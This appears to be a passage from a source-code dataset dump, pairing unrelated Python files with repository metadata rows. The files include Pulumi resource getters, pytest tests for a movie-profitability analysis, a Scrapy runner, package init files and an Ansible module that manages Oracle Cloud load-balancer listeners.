__props__.__dict__["password"] = password
__props__.__dict__["reply_address"] = reply_address
__props__.__dict__["sendtype"] = sendtype
__props__.__dict__["status"] = status
return MailAddress(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
"""
The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
"""
return pulumi.get(self, "account_name")
@property
@pulumi.getter
def password(self) -> pulumi.Output[Optional[str]]:
"""
Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter(name="replyAddress")
def reply_address(self) -> pulumi.Output[Optional[str]]:
"""
Return address.
"""
return pulumi.get(self, "reply_address")
@property
@pulumi.getter
def sendtype(self) -> pulumi.Output[str]:
"""
Account type. Valid values: `batch`, `trigger`.
"""
return pulumi.get(self, "sendtype")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Account Status freeze: 1, normal: 0.
"""
return pulumi.get(self, "status")
| 40.680739
| 183
| 0.638929
| 1,799
| 15,418
| 5.292385
| 0.108949
| 0.071631
| 0.088226
| 0.078563
| 0.822183
| 0.797185
| 0.775864
| 0.740258
| 0.734902
| 0.71232
| 0
| 0.005177
| 0.260799
| 15,418
| 378
| 184
| 40.78836
| 0.830218
| 0.371838
| 0
| 0.630208
| 1
| 0
| 0.090377
| 0.004938
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.125
| 0.026042
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
be95e8415cbcf5e535eb450da1c0b73734e38b6d
| 80
|
py
|
Python
|
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
from tkinter import *
from tkinter import messagebox
#import BasicErrorComponent
| 26.666667
| 30
| 0.8625
| 9
| 80
| 7.666667
| 0.555556
| 0.318841
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 3
| 31
| 26.666667
| 0.971831
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
beb197627874a5ffd86d853bb73e94b271c6d154
| 4,691
|
py
|
Python
|
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | null | null | null |
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | 2
|
2021-09-08T01:18:53.000Z
|
2022-01-13T01:40:56.000Z
|
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | 1
|
2019-09-30T13:21:41.000Z
|
2019-09-30T13:21:41.000Z
|
from analyze_movie import movie_analysis
import pytest
class TestMovieAnalysis:
def test_sql_actor_heading(self):
expected_heading = 'actor_1_name'
actual_heading = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
actors=True,
dataframe=False)[0][0]
assert expected_heading == actual_heading
def test_sql_genre_heading(self):
expected_heading = 'genres'
actual_heading = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
dataframe=False)[0][0]
assert expected_heading == actual_heading
def test_sql_actor_results(self):
expected_result = ('CCH Pounder', 237000000.0, 760505847.0, 523505847.0)
actual_result = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
actors=True,
dataframe=False)[1][0]
assert expected_result == actual_result
def test_sql_genre_results(self):
expected_result = ('Action|Adventure|Fantasy|Sci-Fi', 237000000.0, 760505847.0, 523505847.0)
actual_result = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
dataframe=False)[1][0]
assert expected_result == actual_result
def test_pandas_actor_results(self):
expected_name = 'Wayne Knight'
expected_profit = 293784000.0
df = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
actors=True,
dataframe=True,
fit_in_memory=True)
actual_name = df.index[0]
actual_profit = df.iloc[0,2]
assert expected_name == actual_name
assert expected_profit == actual_profit
def test_pandas_genre_results(self):
expected_genre = 'Family|Sci-Fi'
expected_profit = 424449459.0
df = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
dataframe=True,
fit_in_memory=True)
actual_genre = df.index[0]
actual_profit = df.iloc[0,2]
assert expected_genre == actual_genre
assert expected_profit == actual_profit
def test_dask_actor_results(self):
expected_name = 'Wayne Knight'
expected_profit = 293784000.0
df = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
actors=True,
dataframe=True,
fit_in_memory=False)
actual_name = df.index[0]
actual_profit = df.iloc[0,2]
assert expected_name == actual_name
assert expected_profit == actual_profit
def test_dask_genre_results(self):
expected_genre = 'Family|Sci-Fi'
expected_profit = 424449459.0
df = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
dataframe=True,
fit_in_memory=False)
actual_genre = df.index[0]
actual_profit = df.iloc[0,2]
assert expected_genre == actual_genre
assert expected_profit == actual_profit
def test_fit_in_memory_logic(self):
with pytest.raises(KeyError):
df = movie_analysis.analyze_profitability("sqlite:///movies.db",
'movie',
dataframe=True,
fit_in_memory=False,
index_col='idx')
| 49.904255
| 100
| 0.452356
| 380
| 4,691
| 5.297368
| 0.165789
| 0.083458
| 0.089419
| 0.147541
| 0.839046
| 0.839046
| 0.839046
| 0.832588
| 0.828614
| 0.828614
| 0
| 0.049347
| 0.477297
| 4,691
| 93
| 101
| 50.44086
| 0.771615
| 0
| 0
| 0.768293
| 0
| 0
| 0.070134
| 0.006608
| 0
| 0
| 0
| 0
| 0.146341
| 1
| 0.109756
| false
| 0
| 0.02439
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fea79ae4a40b117779eb70b3e839c7ede6d79b1b
| 187
|
py
|
Python
|
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | null | null | null |
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | null | null | null |
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | 1
|
2021-01-28T16:51:52.000Z
|
2021-01-28T16:51:52.000Z
|
# -*- coding: utf-8 -*-
from scrapy import cmdline
# cmdline.execute("scrapy runspider gd/spiders/spider_gd.py".split())
cmdline.execute("scrapy runspider gd/spiders/safari.py".split())
| 31.166667
| 69
| 0.737968
| 26
| 187
| 5.269231
| 0.576923
| 0.20438
| 0.291971
| 0.423358
| 0.554745
| 0.554745
| 0
| 0
| 0
| 0
| 0
| 0.005882
| 0.090909
| 187
| 5
| 70
| 37.4
| 0.8
| 0.475936
| 0
| 0
| 0
| 0
| 0.389474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
feacb480f072ddea612c4a6de9d331b78a832b7c
| 246
|
py
|
Python
|
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 28
|
2021-01-27T00:41:40.000Z
|
2022-02-14T10:11:51.000Z
|
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | null | null | null |
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 6
|
2021-02-03T01:42:08.000Z
|
2021-12-03T17:47:19.000Z
|
from .gaussian import Gaussian
from .source import Source
from .discreteLogistic import DiscreteLogistic, MixtureDiscreteLogistic
from .hierarchyPrior import HierarchyPrior, ParameterizedHierarchyPrior, PassiveHierarchyPrior, SimpleHierarchyPrior
| 61.5
| 116
| 0.890244
| 20
| 246
| 10.95
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077236
| 246
| 4
| 116
| 61.5
| 0.964758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
228e9a933d0cda0ee8f3e0cbb78a97ad0c3e4c6a
| 375
|
py
|
Python
|
rangeset/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | 13
|
2016-12-16T09:23:09.000Z
|
2018-03-10T08:04:00.000Z
|
rangeset/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | 74
|
2017-03-23T11:36:22.000Z
|
2018-04-02T06:19:09.000Z
|
rangeset/__init__.py
|
drmingdrmer/pykit
|
e25a71146e81aaf79625cf8d4f4c439ccd515b82
|
[
"MIT"
] | 5
|
2016-12-27T07:30:47.000Z
|
2018-03-10T07:06:21.000Z
|
from .rangeset import (
IntIncRange,
IntIncRangeSet,
Range,
RangeDict,
RangeSet,
ValueRange,
substract_range,
intersect,
substract,
union,
)
__all__ = [
"IntIncRange",
"IntIncRangeSet",
"Range",
"RangeDict",
"RangeSet",
"ValueRange",
"substract_range",
"intersect",
"substract",
"union",
]
| 12.5
| 23
| 0.573333
| 26
| 375
| 8.038462
| 0.461538
| 0.239234
| 0.287081
| 0.373206
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0
| 0
| 0.304
| 375
| 29
| 24
| 12.931034
| 0.800766
| 0
| 0
| 0
| 0
| 0
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
22daf5611f99cde53f41826e5d312b39a61f6f28
| 30,818
|
py
|
Python
|
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_loadbalancer_listener
short_description: Manage a Listener resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a Listener resource in Oracle Cloud Infrastructure
- For I(state=present), adds a listener to a load balancer.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
default_backend_set_name:
description:
- The name of the associated backend set.
- "Example: `example_backend_set`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: str
port:
description:
- The communication port for the listener.
- "Example: `80`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: int
protocol:
description:
- The protocol on which the listener accepts connection requests.
To get a list of valid protocols, use the L(ListProtocols,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/LoadBalancerProtocol/ListProtocols)
operation.
- "Example: `HTTP`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: str
hostname_names:
description:
- An array of hostname resource names.
- This parameter is updatable.
type: list
elements: str
path_route_set_name:
description:
- Deprecated. Please use `routingPolicies` instead.
- The name of the set of path-based routing rules, L(PathRouteSet,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/PathRouteSet/),
applied to this listener's traffic.
- "Example: `example_path_route_set`"
- This parameter is updatable.
type: str
ssl_configuration:
description:
- ""
- This parameter is updatable.
type: dict
suboptions:
verify_depth:
description:
- The maximum depth for peer certificate chain verification.
- "Example: `3`"
type: int
verify_peer_certificate:
description:
- Whether the load balancer listener should verify peer certificates.
- "Example: `true`"
type: bool
trusted_certificate_authority_ids:
description:
- Ids for OCI certificates service CA or CA bundles for the load balancer to trust.
- "Example: `[ocid1.cabundle.oc1.us-ashburn-1.amaaaaaaav3bgsaagl4zzyqdop5i2vuwoqewdvauuw34llqa74otq2jdsfyq]`"
type: list
elements: str
certificate_ids:
description:
- Ids for OCI certificates service certificates. Currently only a single Id may be passed.
- "Example: `[ocid1.certificate.oc1.us-ashburn-1.amaaaaaaav3bgsaa5o2q7rh5nfmkkukfkogasqhk6af2opufhjlqg7m6jqzq]`"
type: list
elements: str
certificate_name:
description:
- A friendly name for the certificate bundle. It must be unique and it cannot be changed.
Valid certificate bundle names include only alphanumeric characters, dashes, and underscores.
Certificate bundle names cannot contain spaces. Avoid entering confidential information.
- "Example: `example_certificate_bundle`"
type: str
protocols:
description:
- A list of SSL protocols the load balancer must support for HTTPS or SSL connections.
- The load balancer uses SSL protocols to establish a secure connection between a client and a server. A secure
connection ensures that all data passed between the client and the server is private.
- "The Load Balancing service supports the following protocols:"
- "* TLSv1
* TLSv1.1
* TLSv1.2"
- If this field is not specified, TLSv1.2 is the default.
- "**Warning:** All SSL listeners created on a given port must use the same set of SSL protocols."
- "**Notes:**"
- "* The handshake to establish an SSL connection fails if the client supports none of the specified protocols.
* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite.
* For all existing load balancer listeners and backend sets that predate this feature, the `GET` operation
displays a list of SSL protocols currently used by those resources."
- "example: `[\\"TLSv1.1\\", \\"TLSv1.2\\"]`"
type: list
elements: str
cipher_suite_name:
description:
- The name of the cipher suite to use for HTTPS or SSL connections.
- If this field is not specified, the default is `oci-default-ssl-cipher-suite-v1`.
- "**Notes:**"
- "* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite. Clients cannot perform an SSL handshake if there is an incompatible configuration.
* You must ensure compatibility between the ciphers configured in the cipher suite and the configured
certificates. For example, RSA-based ciphers require RSA certificates and ECDSA-based ciphers require ECDSA
certificates.
* If the cipher configuration is not modified after load balancer creation, the `GET` operation returns
`oci-default-ssl-cipher-suite-v1` as the value of this field in the SSL configuration for existing listeners
that predate this feature.
* If the cipher configuration was modified using Oracle operations after load balancer creation, the `GET`
operation returns `oci-customized-ssl-cipher-suite` as the value of this field in the SSL configuration for
existing listeners that predate this feature.
* The `GET` operation returns `oci-wider-compatible-ssl-cipher-suite-v1` as the value of this field in the SSL
configuration for existing backend sets that predate this feature.
* If the `GET` operation on a listener returns `oci-customized-ssl-cipher-suite` as the value of this field,
you must specify an appropriate predefined or custom cipher suite name when updating the resource.
* The `oci-customized-ssl-cipher-suite` Oracle reserved cipher suite name is not accepted as valid input for
this field."
- "example: `example_cipher_suite`"
type: str
server_order_preference:
description:
- When this attribute is set to ENABLED, the system gives preference to the server ciphers over the client
ciphers.
- "**Note:** This configuration is applicable only when the load balancer is acting as an SSL/HTTPS server. This
field is ignored when the `SSLConfiguration` object is associated with a backend set."
type: str
choices:
- "ENABLED"
- "DISABLED"
connection_configuration:
description:
- ""
- This parameter is updatable.
type: dict
suboptions:
idle_timeout:
description:
- The maximum idle time, in seconds, allowed between two successive receive or two successive send operations
between the client and backend servers. A send operation does not reset the timer for receive operations. A
receive operation does not reset the timer for send operations.
- For more information, see L(Connection
Configuration,https://docs.cloud.oracle.com/Content/Balance/Reference/connectionreuse.htm#ConnectionConfiguration).
- "Example: `1200`"
type: int
required: true
backend_tcp_proxy_protocol_version:
description:
- The backend TCP Proxy Protocol version.
- "Example: `1`"
type: int
name:
description:
- A friendly name for the listener. It must be unique and it cannot be changed.
Avoid entering confidential information.
- "Example: `example_listener`"
type: str
required: true
routing_policy_name:
description:
- The name of the routing policy applied to this listener's traffic.
- "Example: `example_routing_policy`"
- This parameter is updatable.
type: str
rule_set_names:
description:
- The names of the L(rule sets,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/loadbalancer/20170115/RuleSet/) to apply to the listener.
- "Example: [\\"example_rule_set\\"]"
- This parameter is updatable.
type: list
elements: str
load_balancer_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the load balancer on which to add a listener.
type: str
required: true
state:
description:
- The state of the Listener.
- Use I(state=present) to create or update a Listener.
- Use I(state=absent) to delete a Listener.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create listener
oci_loadbalancer_listener:
# required
default_backend_set_name: example_backend_set
port: 80
protocol: HTTP
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
# optional
hostname_names: [ "null" ]
path_route_set_name: example_path_route_set
ssl_configuration:
# optional
verify_depth: 3
verify_peer_certificate: true
trusted_certificate_authority_ids: [ "null" ]
certificate_ids: [ "null" ]
certificate_name: example_certificate_bundle
protocols: [ "null" ]
cipher_suite_name: cipher_suite_name_example
server_order_preference: ENABLED
connection_configuration:
# required
idle_timeout: 1200
# optional
backend_tcp_proxy_protocol_version: 1
routing_policy_name: example_routing_policy
rule_set_names: [ "null" ]
- name: Update listener
oci_loadbalancer_listener:
# required
default_backend_set_name: example_backend_set
port: 80
protocol: HTTP
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
# optional
hostname_names: [ "null" ]
path_route_set_name: example_path_route_set
ssl_configuration:
# optional
verify_depth: 3
verify_peer_certificate: true
trusted_certificate_authority_ids: [ "null" ]
certificate_ids: [ "null" ]
certificate_name: example_certificate_bundle
protocols: [ "null" ]
cipher_suite_name: cipher_suite_name_example
server_order_preference: ENABLED
connection_configuration:
# required
idle_timeout: 1200
# optional
backend_tcp_proxy_protocol_version: 1
routing_policy_name: example_routing_policy
rule_set_names: [ "null" ]
- name: Delete listener
oci_loadbalancer_listener:
# required
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
"""
RETURN = """
listener:
description:
- Details of the Listener resource acted upon by the current operation
returned: on success
type: complex
contains:
name:
description:
- A friendly name for the listener. It must be unique and it cannot be changed.
- "Example: `example_listener`"
returned: on success
type: str
sample: example_listener
default_backend_set_name:
description:
- The name of the associated backend set.
- "Example: `example_backend_set`"
returned: on success
type: str
sample: example_backend_set
port:
description:
- The communication port for the listener.
- "Example: `80`"
returned: on success
type: int
sample: 0
protocol:
description:
- The protocol on which the listener accepts connection requests.
To get a list of valid protocols, use the L(ListProtocols,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/LoadBalancerProtocol/ListProtocols)
operation.
- "Example: `HTTP`"
returned: on success
type: str
sample: HTTP
hostname_names:
description:
- An array of hostname resource names.
returned: on success
type: list
sample: []
path_route_set_name:
description:
- Deprecated. Please use `routingPolicies` instead.
- The name of the set of path-based routing rules, L(PathRouteSet,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/PathRouteSet/),
applied to this listener's traffic.
- "Example: `example_path_route_set`"
returned: on success
type: str
sample: example_path_route_set
ssl_configuration:
description:
- ""
returned: on success
type: complex
contains:
verify_depth:
description:
- The maximum depth for peer certificate chain verification.
- "Example: `3`"
returned: on success
type: int
sample: 3
verify_peer_certificate:
description:
- Whether the load balancer listener should verify peer certificates.
- "Example: `true`"
returned: on success
type: bool
sample: true
trusted_certificate_authority_ids:
description:
- Ids for OCI certificates service CA or CA bundles for the load balancer to trust.
- "Example: `[ocid1.cabundle.oc1.us-ashburn-1.amaaaaaaav3bgsaagl4zzyqdop5i2vuwoqewdvauuw34llqa74otq2jdsfyq]`"
returned: on success
type: list
sample: []
certificate_ids:
description:
- Ids for OCI certificates service certificates. Currently only a single Id may be passed.
- "Example: `[ocid1.certificate.oc1.us-ashburn-1.amaaaaaaav3bgsaa5o2q7rh5nfmkkukfkogasqhk6af2opufhjlqg7m6jqzq]`"
returned: on success
type: list
sample: []
certificate_name:
description:
- A friendly name for the certificate bundle. It must be unique and it cannot be changed.
Valid certificate bundle names include only alphanumeric characters, dashes, and underscores.
Certificate bundle names cannot contain spaces. Avoid entering confidential information.
- "Example: `example_certificate_bundle`"
returned: on success
type: str
sample: example_certificate_bundle
server_order_preference:
description:
- When this attribute is set to ENABLED, the system gives preference to the server ciphers over the client
ciphers.
- "**Note:** This configuration is applicable only when the load balancer is acting as an SSL/HTTPS server. This
field is ignored when the `SSLConfiguration` object is associated with a backend set."
returned: on success
type: str
sample: ENABLED
cipher_suite_name:
description:
- The name of the cipher suite to use for HTTPS or SSL connections.
- If this field is not specified, the default is `oci-default-ssl-cipher-suite-v1`.
- "**Notes:**"
- "* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite. Clients cannot perform an SSL handshake if there is an incompatible configuration.
* You must ensure compatibility between the ciphers configured in the cipher suite and the configured
certificates. For example, RSA-based ciphers require RSA certificates and ECDSA-based ciphers require ECDSA
certificates.
* If the cipher configuration is not modified after load balancer creation, the `GET` operation returns
`oci-default-ssl-cipher-suite-v1` as the value of this field in the SSL configuration for existing listeners
that predate this feature.
* If the cipher configuration was modified using Oracle operations after load balancer creation, the `GET`
operation returns `oci-customized-ssl-cipher-suite` as the value of this field in the SSL configuration for
existing listeners that predate this feature.
* The `GET` operation returns `oci-wider-compatible-ssl-cipher-suite-v1` as the value of this field in the SSL
configuration for existing backend sets that predate this feature.
* If the `GET` operation on a listener returns `oci-customized-ssl-cipher-suite` as the value of this field,
you must specify an appropriate predefined or custom cipher suite name when updating the resource.
* The `oci-customized-ssl-cipher-suite` Oracle reserved cipher suite name is not accepted as valid input for
this field."
- "example: `example_cipher_suite`"
returned: on success
type: str
sample: cipher_suite_name_example
protocols:
description:
- A list of SSL protocols the load balancer must support for HTTPS or SSL connections.
- The load balancer uses SSL protocols to establish a secure connection between a client and a server. A secure
connection ensures that all data passed between the client and the server is private.
- "The Load Balancing service supports the following protocols:"
- "* TLSv1
* TLSv1.1
* TLSv1.2"
- If this field is not specified, TLSv1.2 is the default.
- "**Warning:** All SSL listeners created on a given port must use the same set of SSL protocols."
- "**Notes:**"
- "* The handshake to establish an SSL connection fails if the client supports none of the specified protocols.
* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite.
* For all existing load balancer listeners and backend sets that predate this feature, the `GET` operation
displays a list of SSL protocols currently used by those resources."
- "example: `[\\"TLSv1.1\\", \\"TLSv1.2\\"]`"
returned: on success
type: list
sample: []
connection_configuration:
description:
- ""
returned: on success
type: complex
contains:
idle_timeout:
description:
- The maximum idle time, in seconds, allowed between two successive receive or two successive send operations
between the client and backend servers. A send operation does not reset the timer for receive operations. A
receive operation does not reset the timer for send operations.
- For more information, see L(Connection
Configuration,https://docs.cloud.oracle.com/Content/Balance/Reference/connectionreuse.htm#ConnectionConfiguration).
- "Example: `1200`"
returned: on success
type: int
sample: 1200
backend_tcp_proxy_protocol_version:
description:
- The backend TCP Proxy Protocol version.
- "Example: `1`"
returned: on success
type: int
sample: 1
rule_set_names:
description:
- The names of the L(rule sets,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/loadbalancer/20170115/RuleSet/) to apply to the listener.
- "Example: [\\"example_rule_set\\"]"
returned: on success
type: list
sample: []
routing_policy_name:
description:
- The name of the routing policy applied to this listener's traffic.
- "Example: `example_routing_policy_name`"
returned: on success
type: str
sample: example_routing_policy_name
sample: {
"name": "example_listener",
"default_backend_set_name": "example_backend_set",
"port": 0,
"protocol": "HTTP",
"hostname_names": [],
"path_route_set_name": "example_path_route_set",
"ssl_configuration": {
"verify_depth": 3,
"verify_peer_certificate": true,
"trusted_certificate_authority_ids": [],
"certificate_ids": [],
"certificate_name": "example_certificate_bundle",
"server_order_preference": "ENABLED",
"cipher_suite_name": "cipher_suite_name_example",
"protocols": []
},
"connection_configuration": {
"idle_timeout": 1200,
"backend_tcp_proxy_protocol_version": 1
},
"rule_set_names": [],
"routing_policy_name": "example_routing_policy_name"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.load_balancer import LoadBalancerClient
from oci.load_balancer.models import CreateListenerDetails
from oci.load_balancer.models import UpdateListenerDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class ListenerHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update and delete"""
def get_module_resource_id_param(self):
return "name"
def get_module_resource_id(self):
return self.module.params.get("name")
def get_create_model_class(self):
return CreateListenerDetails
def is_update(self):
if not self.module.params.get("state") == "present":
return False
return self.does_resource_exist()
def is_create(self):
if not self.module.params.get("state") == "present":
return False
return not self.does_resource_exist()
def create_resource(self):
create_details = self.get_create_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.create_listener,
call_fn_args=(),
call_fn_kwargs=dict(
create_listener_details=create_details,
load_balancer_id=self.module.params.get("load_balancer_id"),
),
waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
operation=oci_common_utils.CREATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=oci_common_utils.get_work_request_completed_states(),
)
def get_update_model_class(self):
return UpdateListenerDetails
def update_resource(self):
update_details = self.get_update_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_listener,
call_fn_args=(),
call_fn_kwargs=dict(
update_listener_details=update_details,
load_balancer_id=self.module.params.get("load_balancer_id"),
listener_name=self.module.params.get("name"),
),
waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=oci_common_utils.get_work_request_completed_states(),
)
def delete_resource(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_listener,
call_fn_args=(),
call_fn_kwargs=dict(
load_balancer_id=self.module.params.get("load_balancer_id"),
listener_name=self.module.params.get("name"),
),
waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=oci_common_utils.get_work_request_completed_states(),
)
ListenerHelperCustom = get_custom_class("ListenerHelperCustom")
class ResourceHelper(ListenerHelperCustom, ListenerHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=True, supports_wait=True
)
module_args.update(
dict(
default_backend_set_name=dict(type="str"),
port=dict(type="int"),
protocol=dict(type="str"),
hostname_names=dict(type="list", elements="str"),
path_route_set_name=dict(type="str"),
ssl_configuration=dict(
type="dict",
options=dict(
verify_depth=dict(type="int"),
verify_peer_certificate=dict(type="bool"),
